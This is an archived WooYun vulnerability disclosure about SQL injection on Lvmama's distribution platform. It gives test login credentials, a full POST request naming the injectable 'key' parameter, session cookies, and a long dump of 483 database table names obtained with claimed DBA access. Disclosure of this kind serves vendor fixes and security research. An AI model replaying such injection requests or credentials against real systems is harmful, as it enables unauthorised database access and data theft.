当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143109

漏洞标题:驴妈妈旅游网某站SQL注入(DBA权限/20个库)

相关厂商:驴妈妈旅游网

漏洞作者: 路人甲

提交时间:2015-09-24 10:26

修复时间:2015-11-08 10:52

公开时间:2015-11-08 10:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-24: 细节已通知厂商并且等待厂商处理中
2015-09-24: 厂商已经确认,细节仅向厂商公开
2015-10-04: 细节向核心白帽子及相关领域专家公开
2015-10-14: 细节向普通白帽子公开
2015-10-24: 细节向实习白帽子公开
2015-11-08: 细节向公众公开

简要描述:

233333

详细说明:

驴妈妈分销平台存在sql注入

登陆.png


123456/123456进入
注入页面

注入页面.png


漏洞证明:

POST /api/wx/adsend_list.jsp HTTP/1.1
Host: fenxiao.lvmama.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://fenxiao.lvmama.com/api/wx/adsend_list.jsp
Cookie: uid=wKgKcFYCKIYO5y3EBiWJAg==; CoreID6=31035080103514429822001&ci=90409730; __utma=30114658.668587984.1442982203.1442982203.1442982203.1;
__utmz=30114658.1442982203.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442982203;
tma=30114658.15709036.1442982214458.1442982214458.1442982214458.1; tmd=2.30114658.15709036.1442982214458.; bfd_g=8a7bc81f66bd068d00000d6800522f5955b9c4a4;
_lvTrack_UUID=EC5FD902-8675-4D0B-839C-61604B7CFCF6; __xsptplus443=443.1.1442982351.1442982351.1%234%7C%7C%7C%7C%7C%23%230t256dYDWHuIjbJceH1Nm1zA8T-Ejs2i%23; JSESSIONID=ecD-
a_OBwBtb;
dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1WPhFSYpZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XP
hNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmY
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
sdate=2015-09-24&edate=2015-09-24&key=12345&order=+a.create_date+desc&pageNo=1


key为注入点

注入点.png


DBA权限

dba.png


涉及20个库

20个库.png


当前数据库500个表

web application technology: Apache
back-end DBMS: Oracle
Database: SAAS14
[483 tables]
+--------------------------------+
| AD_CONTENT |
| AD_PAGE |
| AD_SEAT |
| AD_SEAT_IMG |
| AD_SEAT_LINK |
| ALITRIP_HOTEL |
| ALITRIP_HOTEL_LOG |
| ALITRIP_HOTEL_ORDER |
| ALITRIP_HOTEL_ORDER_LOG |
| ALITRIP_HOTEL_PRODUCT |
| ALITRIP_HOTEL_PROD_LOG |
| ALITRIP_HOTEL_PROD_SYNC_LOG |
| ALITRIP_MENPIAO_LOG |
| ALITRIP_MENPIAO_NEWLOG |
| ALITRIP_MENPIAO_ORDER |
| ALITRIP_MENPIAO_PRODUCT |
| ALITRIP_MENPIAO_RECEIVE |
| ALITRIP_ROOMTYPE |
| B2B_CHANNEL_PRICE |
| B2B_CHANNEL_PRICE_DAY |
| B2B_DEALER |
| B2B_DEALER_DAY |
| B2B_DEALER_LOG |
| B2B_FREETRAVEL |
| B2B_GRADE_PRICE |
| B2B_ORDER_REPORT |
| B2B_PACKAGE |
| B2B_SQPRICE |
| B2B_SQPRICE_DETAIL |
| B2B_TICKET |
| B2B_TICKET_2012 |
| B2B_TICKET_2013 |
| B2B_TICKET_AIRPORT |
| B2B_TICKET_BD |
| B2B_TICKET_CHANGE |
| B2B_TICKET_CHANGE_DETAIL |
| B2B_TICKET_CODE |
| B2B_TICKET_COND |
| B2B_TICKET_CONFIRM_LOG |
| B2B_TICKET_DETAIL |
| B2B_TICKET_DETAIL_2012 |
| B2B_TICKET_DETAIL_2013 |
| B2B_TICKET_EX |
| B2B_TICKET_FINISH_LOG |
| B2B_TICKET_HIS |
| B2B_TICKET_LOG |
| B2B_TICKET_PEOPLE |
| B2B_TICKET_STARTINFO |
| B2B_TICKET_TRAFFIC |
| B2C_CHANNEL_PRICE |
| B2C_TAOBAO_CONFIG |
| B2C_TAOBAO_LOG |
| B2C_TAOBAO_NOTIFYRECEIVEMSG |
| B2C_TAOBAO_ORDER |
| B2C_TAOBAO_ORDER_LOG |
| B2C_TAOBAO_PRODUCT |
| BANK_CITYCODE |
| BILL_TO_UFSOFT |
| CM_CHANNEL_PRICE |
| CM_ORDER_LOG |
| CM_PAY_BALANCE |
| CM_PAY_DRAWMONEY |
| CM_PAY_DRAWMONEY_LOG |
| CM_PAY_MONEY_LOG |
| CM_PAY_ORDER_LOG |
| CM_PROD_LOG |
| CM_SYNC_LOG |
| CM_SYNC_PROD_LOG |
| CM_USER |
| CM_USER_INFO |
| CRUEL_CODE_CUST |
| CRUEL_CODE_LIST |
| CRUEL_CODE_LOG |
| CRUEL_CODE_MESSAGE |
| CRUEL_CODE_POS |
| CRUEL_CODE_VERIFY |
| CRUEL_EXP_CODE |
| CRUEL_EXP_LIST |
| CTRIPTICKET_ORDER_LOG |
| CUSTVIEW_INFO |
| CUST_BALANCE_LOG |
| CUST_INFO_GROUP_CHANNEL |
| CUST_VIEW_INFO |
| DIY_MDD |
| DIY_MDD_TYPE |
| DIY_REL_MDD_PROD |
| EXPCODE_DETAIL |
| EXPCODE_LIST |
| GROUP_INFO |
| GROUP_INFO_2ND |
| GROUP_INFO_DETAIL_2ND |
| GROUP_INFO_ORDER |
| GROUP_ORDER |
| GROUP_ORDER_PEOPLE |
| GROUP_SET |
| GROUP_YY_ORDER |
| GROUP_YY_ORDER_COND |
| GROUP_YY_ORDER_DETAIL |
| GROUP_YY_ORDER_LOG |
| GROUP_YY_ORDER_PEOPLE |
| GRP_CHANNEL_PRICE |
| GRP_GRADE_PRICE |
| GRP_ORDER |
| GRP_ORDER_DETAIL |
| GRP_TICKET |
| GRP_TICKET_PRICE |
| HOTEL_WEEKSHOW |
| IMP_CODE |
| IMP_CODE_DETAIL |
| IMP_CODE_LIST |
| INFO_AIRPORT |
| INFO_AIRPORT_FLIGHT |
| INFO_AIRPORT_NUM |
| INFO_AIRPORT_NUM_LIST |
| INFO_AIRPORT_PRICE |
| INFO_AIRPORT_SEAT |
| INFO_AUTO_PRICE |
| INFO_CAR |
| INFO_CAR_TYPE |
| INFO_CATALOG |
| INFO_COMMENT |
| INFO_CONDS |
| INFO_CTRIPTICKET |
| INFO_FREETRAVEL |
| INFO_FREETRAVEL_TREE |
| INFO_GROUP |
| INFO_GROUP_DETAIL |
| INFO_HOTEL |
| INFO_HOTEL_NUM |
| INFO_HOTEL_PRICE |
| INFO_HOTEL_SET |
| INFO_INSURANCE |
| INFO_INSURANCE_LOG |
| INFO_INSURANCE_ORDER |
| INFO_JD |
| INFO_MEITUAN |
| INFO_NEWS |
| INFO_NEWS_READLOG |
| INFO_PLAN_PRICE |
| INFO_PROD |
| INFO_QUNAR_VIEW |
| INFO_TB_PRICE |
| INFO_TICKET |
| INFO_TICKET_CANCEL |
| INFO_TICKET_COND |
| INFO_TICKET_CUST |
| INFO_TICKET_DETAIL |
| INFO_TICKET_EX |
| INFO_TICKET_MAILTEMP |
| INFO_TICKET_NUM |
| INFO_TICKET_NUM_FOREX |
| INFO_TICKET_PRICE |
| INFO_TICKET_PRICE_FOREX |
| INFO_TICKET_REL |
| INFO_TICKET_RELAREA |
| INFO_TICKET_RELCAT |
| INFO_TICKET_RELVIEW |
| INFO_TICKET_REL_CUST |
| INFO_TOGO |
| INFO_TRAFFIC_NUM_LIST |
| INFO_TRAFFIC_PLACE |
| INFO_TRAFFIC_PRICE |
| INFO_TRAFFIC_SEAT |
| INFO_TRAFFIC_STATION |
| INFO_TRAFFIC_TIMES |
| INFO_TRAVEL |
| INFO_TRAVEL_CYCLE |
| INFO_TRAVEL_CYCLE_AUTO |
| INFO_TRAVEL_JOURNEY |
| INFO_TRAVEL_PRICE |
| INFO_TRAVEL_SEAT |
| INFO_VENUE |
| INFO_VENUE_NUM |
| INFO_VISA |
| INTERFACE_AILVTONG_LOG |
| INTERFACE_AIZHAOPIAO_LOG |
| INTERFACE_BEIZHU_LOG |
| INTERFACE_CAIHUISHIJIE_LOG |
| INTERFACE_CHANGLU_LOG |
| INTERFACE_CHANGLV_LOG |
| INTERFACE_CHANGYOUTONG_LOG |
| INTERFACE_CTRIP_HOLIDAY |
| INTERFACE_DADONGRT_LOG |
| INTERFACE_DDRT_LOG |
| INTERFACE_DIANPING_LOG |
| INTERFACE_DMZH_LOG |
| INTERFACE_DUMUQIAO_LOG |
| INTERFACE_FURONGYUAN_LOG |
| INTERFACE_FZG_BIZZONE |
| INTERFACE_GLYD |
| INTERFACE_HKDISNEY_LOG |
| INTERFACE_HOTEL |
| INTERFACE_HOTEL_BE_PRODUCT |
| INTERFACE_HOTEL_DDS_LOG |
| INTERFACE_HOTEL_DDS_ORDER_LOG |
| INTERFACE_HOTEL_JL |
| INTERFACE_HOTEL_JL_LOG |
| INTERFACE_HOTEL_JL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_LOG |
| INTERFACE_HOTEL_LTJL_ORDER_LOG |
| INTERFACE_HOTEL_LTJL_PRODUCT |
| INTERFACE_HOTEL_LYY_ORDER_LOG |
| INTERFACE_HOTEL_PRODUCT |
| INTERFACE_HOTEL_XH_LOG |
| INTERFACE_HOTEL_XH_ORDER_LOG |
| INTERFACE_HOTEL_XH_PRODUCT |
| INTERFACE_HUANQIU_LOG |
| INTERFACE_HUANTAOYOU_LOG |
| INTERFACE_HUAXIAPIAOLIAN_LOG |
| INTERFACE_IHUIU_LOG |
| INTERFACE_IMAGECO |
| INTERFACE_IMAGECO_CUST |
| INTERFACE_JD_CHANNEL_LOG |
| INTERFACE_JD_COUPON_PWD |
| INTERFACE_JIDIAOTONG_LOG |
| INTERFACE_KUIYUAN_LOG |
| INTERFACE_KUXIU_LOG |
| INTERFACE_LEXIAOXIANG_LOG |
| INTERFACE_LINE |
| INTERFACE_LINGNAN_LOG |
| INTERFACE_LIULIUKA_LOG |
| INTERFACE_LLK_CODE |
| INTERFACE_LLK_CUST |
| INTERFACE_LOG |
| INTERFACE_LONG |
| INTERFACE_LVMAMA_LOG |
| INTERFACE_MAP |
| INTERFACE_MEITUAN_DETAIL |
| INTERFACE_MEITUAN_LOG |
| INTERFACE_MJLD_LOG |
| INTERFACE_MOUNTWG_LOG |
| INTERFACE_MTS |
| INTERFACE_MTS_LOG |
| INTERFACE_PIAOFUTONG_LOG |
| INTERFACE_PIAOGJ_LOG |
| INTERFACE_PIAOGONGCHANG_LOG |
| INTERFACE_PIAOWUBA_LOG |
| INTERFACE_PIAOZHIJIA_LOG |
| INTERFACE_PRICE_RULE |
| INTERFACE_PROD_SYNC_LOG |
| INTERFACE_QUNAR |
| INTERFACE_QUNAR_HISTORY_LOG |
| INTERFACE_QUNAR_HOLIDAY |
| INTERFACE_QUNAR_HOLIDAY_LOG |
| INTERFACE_QUNAR_HOTEL |
| INTERFACE_QUNAR_HOTEL_LOG |
| INTERFACE_QUNAR_INVOICE |
| INTERFACE_QUNAR_LINE_LOG |
| INTERFACE_QUNAR_LOG |
| INTERFACE_QUNAR_MOVE |
| INTERFACE_QUNAR_SUPPLIER_LOG |
| INTERFACE_SHANHAIGUAN_LOG |
| INTERFACE_SXLY |
| INTERFACE_SYNC_LOG |
| INTERFACE_TIANGUI_LOG |
| INTERFACE_TIANKE_LOG |
| INTERFACE_TICKET |
| INTERFACE_TONGCHENG_LOG |
| INTERFACE_TOURMART_LOG |
| INTERFACE_VISITBEIJING_LOG |
| INTERFACE_WULONG_LOG |
| INTERFACE_XIECHENG_LOG |
| INTERFACE_XINAIMOKE_LOG |
| INTERFACE_YANGGUANGLZ_LOG |
| INTERFACE_YINLVTONG_LOG |
| INTERFACE_YUANFAN_LOG |
| INTERFACE_YYJQ_LOG |
| INTERFACE_ZHONGJINGXIN_LOG |
| JOURNEY |
| JOURNEY_COMMENT |
| JOURNEY_DETAIL |
| JOURNEY_PRO_DETAIL |
| LVMAMA_CHUANHUO_LOG |
| LVMAMA_PRODUCT_INFO |
| LVMAMA_PRODUCT_LIST |
| LVMAMA_PUSH_LOG |
| LVMAMA_UPDATE_FLAG |
| LVMAMA_VIEW |
| LVMAMA_VIEW_INFO |
| LVWUTONGCODE_QUEUE |
| LVWUTONG_SMSMODE |
| LVWUTONG_TMPCODE |
| LVWUTONG_TMPCODE_GROUP |
| LVWUTONG_TMPCODE_LOG |
| LVWUTONG_TMPCODE_USE |
| ONLINE_DEBUG_LOG |
| ORDER_ABNORMAL_LOG |
| ORDER_CHANGE_LOG |
| ORDER_LOG |
| ORDER_RELATION_LOG |
| PAY_BALANCE |
| PAY_CREDIT_FEE |
| PAY_DRAWMONEY |
| PAY_MOMEY_LOG |
| PAY_ORDER_LOG |
| PLAN_TABLE |
| QUNAR_PRICE_CACHE |
| RECE_APP |
| RECE_APP_DETAIL |
| RECE_PAYMENT_DETAIL |
| RECE_PAYMENT_LIST |
| RECE_STATEMENT_LIST |
| RUPD$_B2B_SETTLE_METHOD |
| RUPD$_B2B_TICKET |
| RUPD$_B2B_TICKET_DETAIL |
| RUPD$_HOTEL_BRAND |
| RUPD$_HOTEL_DISTRICT |
| RUPD$_HOTEL_INFO |
| RUPD$_INFO_AREA |
| RUPD$_INFO_AREA_EX |
| RUPD$_INFO_BANK |
| RUPD$_INFO_CAR |
| RUPD$_INFO_CONDS |
| RUPD$_INFO_HOTEL |
| RUPD$_INFO_NEWS |
| RUPD$_INFO_PROD |
| RUPD$_INFO_TICKET |
| RUPD$_INFO_TICKET_CANCEL |
| RUPD$_INFO_TICKET_COND |
| RUPD$_INFO_TICKET_DETAIL |
| RUPD$_INFO_TICKET_EX |
| RUPD$_INFO_TICKET_PRICE |
| RUPD$_INFO_TICKET_RELAREA |
| RUPD$_INFO_TICKET_RELVIEW |
| RUPD$_INFO_TRAVEL |
| RUPD$_INFO_VISA |
| RUPD$_INFO_VISA_SORT |
| RUPD$_INTERFACE_LLK_CUST |
| RUPD$_SAAS_PERMISSION |
| RUPD$_SAAS_USER_INFO |
| RUPD$_TB_USR_INFO |
| RUPD$_TB_VIEW_INFO |
| RUPD$_USR_TAG |
| RUPD$_USR_VIEW |
| SAAS_AREA_SUB |
| SAAS_BUY_LOG |
| SAAS_CLUSTER |
| SAAS_DATAMAN |
| SAAS_INFO_AREA |
| SAAS_INFO_SUB |
| SAAS_NEWS |
| SAAS_NEWS_SORT |
| SAAS_NOTICE |
| SAAS_ORDER_SOURCE |
| SAAS_PAY_DRAWMONEY |
| SAAS_PAY_DRAWMONEY_LOG |
| SAAS_PAY_PRODUCT_TYPE |
| SAAS_PAY_SERVICE |
| SAAS_TABLE_SQL |
| SAAS_VAP_ORDER |
| SAAS_VAP_PRODUCT |
| SAAS_VIEW_SUB |
| SETTLE_ACCOUNT |
| SETTLE_PAYABLE |
| SETTLE_PAYABLE_DETAIL |
| SETTLE_PAYABLE_LIST |
| SETTLE_PAYAPP |
| SETTLE_PAYAPP_DETAIL |
| SETTLE_STATEMENT_DETAIL |
| SETTLE_STATEMENT_LIST |
| SITE_IP2 |
| SMS_CONSUME_LOG |
| SMS_GETMONEY_LOG |
| STOCK_ADD_LOG |
| STOCK_REPORT_DAY |
| SYS_CURRENCY_RATE |
| SYS_FEE_LOG |
| SYS_REFER |
| SYS_REPORT_DAY |
| SYS_SMS_LOG |
| SYS_SQL_HISTORY |
| SYS_SQL_QUEUE |
| TB_CONSUME_CODE |
| TB_RECEIVE_LOG |
| TEST_DB |
| TOUREASY_AREA |
| TOUREASY_LINE |
| TOUREASY_ORDER_INFO_PINGZHENG |
| TOUREASY_ORDER_QUEUE |
| TOUREASY_PRODUCT |
| TOUREASY_USR_LOG |
| TOUR_GUIDE |
| TRAFFIC_TO_TICKET |
| T_EQUIP |
| T_EQUIPSUB |
| T_LANDMARK |
| T_MATERIA |
| T_PRO_COMMON_NUM |
| T_PRO_COMMON_PRICE |
| T_PRO_DETAIL_COURSE |
| T_REGIONS |
| T_REGIONS_QD |
| T_REGIONS_SUBWAY |
| T_SPORTTYPE |
| T_VENUE |
| T_VENUE_COUNT |
| T_VENUE_PRICE |
| T_VENUE_RECORD |
| T_VENUE_SUB |
| UF_SOFT_QUEUE |
| UF_SOFT_SETTLE_PAYABLE |
| UF_SOFT_USR_CREDIT_LOG |
| UNIONPAY_CONFIG |
| UNIONPAY_TRADE_LOG |
| UPDATE_FOREXPRICE_LOG |
| USR_ACCOUNT |
| USR_ACCOUNT_LOG |
| USR_ACCOUNT_SET |
| USR_ATTENTION |
| USR_BALANCE_LOG |
| USR_BOOK |
| USR_CHECKIN_TYPE |
| USR_CREDIT |
| USR_CREDIT_LOG |
| USR_DEALER |
| USR_DEPT |
| USR_DIST |
| USR_DOCUMENT_TEMP |
| USR_ENTERPRISE_TAG |
| USR_GETPASS_LOG |
| USR_GRADE |
| USR_HOTEL_COND |
| USR_INFO |
| USR_INFO_B2C |
| USR_INFO_EXPRESS |
| USR_INTERFACE |
| USR_INTERFACE_INFO |
| USR_LOG |
| USR_LOGIN |
| USR_LOGIN_LOG |
| USR_LOG_2011 |
| USR_LOG_2012 |
| USR_LOG_2013 |
| USR_MAILTEMP_LIST |
| USR_MANAGER_USER |
| USR_MEMBER |
| USR_MENU |
| USR_MSG |
| USR_MSG_COMMENT |
| USR_MSG_MONEY |
| USR_PAGES |
| USR_POWER_AREA |
| USR_PRINT_TEMP |
| USR_PROD_CODE |
| USR_PROD_WHILE_AREA |
| USR_PROD_WHILE_DETAIL |
| USR_PROD_WHILE_GROUP |
| USR_PROD_WHILE_LIST |
| USR_PROD_WHILE_TREE |
| USR_SCORE |
| USR_SCORE_DETAIL |
| USR_SCORE_LOG |
| USR_SCORE_RULE |
| USR_VIEW_BAK |
| USR_VIEW_BOUNTY |
| USR_VIEW_COLUMN |
| USR_VIEW_COPY |
| USR_VIEW_LINK |
| USR_VIEW_MSG |
| USR_VIEW_MSG_HIS |
| USR_VIEW_NAV |
| USR_VIEW_PAGE |
| USR_VIEW_TEMPLATE |
| WX_AD |
| WX_AD_DETAIL |
| WX_AD_SEND_LOG |
| WX_KEY |
| WX_MSG |
| WX_MSG_TEMP |
| WX_ORDER_TASK |
| WX_SCENE |
| WX_SCENE_IN |
| WX_SCENE_LOG |
| WX_SEND_HISTORY |
| WX_SEND_QUEUE |
| WX_SET |
| WX_TREE |
| WX_USER_INFO |
| XIECHENG_HOTEL_INFO |
| XIECHENG_HOTEL_LOG |
| XIECHENG_HOTEL_ORDER |
| XIECHENG_HOTEL_STATE |
| INTERFACE_KUIYUAN_LOG |
+--------------------------------+


大量数据,其他库里肯定有分销商信息,就不找了

数据.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-24 10:51

厂商回复:

之前有人提了,谢谢

最新状态:

暂无


漏洞评价:

评论